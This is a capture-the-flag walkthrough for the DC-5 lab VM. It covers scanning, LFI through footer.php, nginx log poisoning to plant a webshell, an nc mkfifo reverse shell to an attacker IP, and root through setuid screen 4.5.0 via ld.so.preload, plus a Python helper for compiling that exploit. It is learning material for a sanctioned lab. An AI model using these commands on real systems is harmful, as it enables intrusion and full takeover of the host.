Target VM information

DESCRIPTION
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

But if you're really, really stuck, you can watch this video which shows the first step.

TECHNICAL INFORMATION
DC-5 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

Information gathering

After deploying the VM, sweep the subnet with nmap to find its IP address: one of the live hosts is Kali's own IP, the other is the target. Then scan the target's open ports.

# ping-sweep the subnet for live hosts (-sP is the old name for -sn, no port scan)
nmap -sP 10.0.0.0/24
# scan all TCP ports on the target and fingerprint the services
nmap -sV -p- 10.0.0.21


Based on the scan results, visit port 80.


As the author hinted, part of the page changes on every refresh. If that content is being pulled in by a dynamic include, there may be a file inclusion vulnerability.


flag1

We can brute-force the site's paths to gather more information, using dirb, wfuzz, or Burp Suite; whichever tool you use, the results are only as good as the wordlist.


The brute-force turns up footer.php, the file whose content changes on refresh, which indicates file inclusion. Keep brute-forcing to verify whether the inclusion is dynamic, i.e. controlled by a request parameter.


Since thankyou.php is the page that may use dynamic file inclusion, try brute-forcing parameter names on it.

  • Just as with footer.php, if index.php is successfully included the rendered page will look different, which is how the correct parameter name shows up.


The brute-force finds the file parameter. With a working local file inclusion we can try to inject a webshell through the nginx log (log poisoning).


After sending the request, the injected PHP is written verbatim into the nginx access log.


The default nginx access log path is /var/log/nginx/access.log; passing it to the file parameter includes the log, and PHP executes the injected code.


Connect with Caidao (菜刀). Because the access log has grown huge from all the brute-forcing, every command returns the whole log, so it is better to use the poisoned log once to write a small webshell elsewhere on the server and work through that instead.


From the webshell, use nc on the server to send a reverse shell back to the attacking host, which gives a more stable shell than the webshell.

# nc reverse shell, run on the target; a listener must already be waiting on 10.0.0.221:1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.221 1234 >/tmp/f

# upgrade the dumb shell to an interactive PTY
python -c 'import pty;pty.spawn("/bin/bash")'

Use find to list setuid binaries:

find / -perm -u=s -type f 2>/dev/null

The list includes screen 4.5.0, which has a known local root exploit; look it up with searchsploit:

searchsploit screen 4.5.0


After obtaining the script, upload it to the target with AntSword (蚁剑).


The script does not run directly on the target. Opening it shows that it writes two C files and compiles them with gcc, so we can compile them on Kali instead and put the resulting binaries on the target. The binaries must match the target (a 64-bit Debian system, per the description) and link against a compatible libc.


Run the relevant part of the script by hand on Kali, compile the files, and upload them to the target.


Then run the remaining steps of the script on the target:

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
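The compile-on-Kali step above, as an added helper that is not part of the walkthrough or of the exploit-db script: it pulls the C sources and gcc commands out of a script that writes its sources with `cat << EOF > path` heredocs and builds them in place, so the sources can be written and compiled locally and only the binaries uploaded. SAMPLE_SCRIPT is a constructed stand-in with the same shape as such a script, not the real exploit; the build directory name is this example's choice.

```python
# Added example (not from the walkthrough or the exploit script): extract the
# heredoc sources and gcc commands from a compile-on-target exploit script.
# SAMPLE_SCRIPT below is constructed for the example; it is not the real script.
import os
import re
import shlex
from pathlib import Path

SAMPLE_SCRIPT = r"""#!/bin/bash
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
__attribute__ ((__constructor__))
void dropshell(void){ printf("[+] constructor ran\n"); }
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){ printf("[+] would spawn a shell here\n"); return 0; }
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
"""

# cat << TAG > path ... TAG   (TAG may be quoted, e.g. << 'EOF')
HEREDOC_RE = re.compile(
    r"^cat\s*<<\s*'?(?P<tag>\w+)'?\s*>\s*(?P<path>\S+)\n(?P<body>.*?)^(?P=tag)\s*$",
    re.M | re.S,
)


def extract_heredocs(script):
    """Map each path written via a heredoc to the source text it receives."""
    return {m["path"]: m["body"] for m in HEREDOC_RE.finditer(script)}


def extract_gcc_commands(script):
    """(argv, output_path) for every gcc line; output defaults to a.out."""
    cmds = []
    for line in script.splitlines():
        line = line.strip()
        if not line.startswith("gcc"):
            continue
        argv = shlex.split(line)
        out = argv[argv.index("-o") + 1] if "-o" in argv else "a.out"
        cmds.append((argv, out))
    return cmds


def local_build_commands(script, workdir="build"):
    """The script's gcc commands with source and output paths moved under
    workdir, so they can be run on Kali without touching the local /tmp."""
    sources = extract_heredocs(script)
    local = lambda p: os.path.join(workdir, os.path.basename(p))
    cmds = []
    for argv, out in extract_gcc_commands(script):
        cmds.append([local(a) if (a in sources or a == out) else a for a in argv])
    return cmds


def write_sources(script, workdir="build"):
    """Write every heredoc source into workdir; returns the paths written."""
    Path(workdir).mkdir(parents=True, exist_ok=True)
    written = []
    for path, body in extract_heredocs(script).items():
        dest = Path(workdir) / os.path.basename(path)
        dest.write_text(body)
        written.append(str(dest))
    return written


if __name__ == "__main__":
    for p in write_sources(SAMPLE_SCRIPT):
        print("wrote", p)
    for argv in local_build_commands(SAMPLE_SCRIPT):
        print(" ".join(argv))          # run these on Kali, then upload the -o outputs
```

Run the printed gcc lines on Kali, upload the two outputs to the paths the script expects on the target (/tmp/libhax.so and /tmp/rootshell in the script above), and then run the remaining ld.so.preload steps from the walkthrough on the target, since those rely on the setuid screen binary there.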


Read the flag.
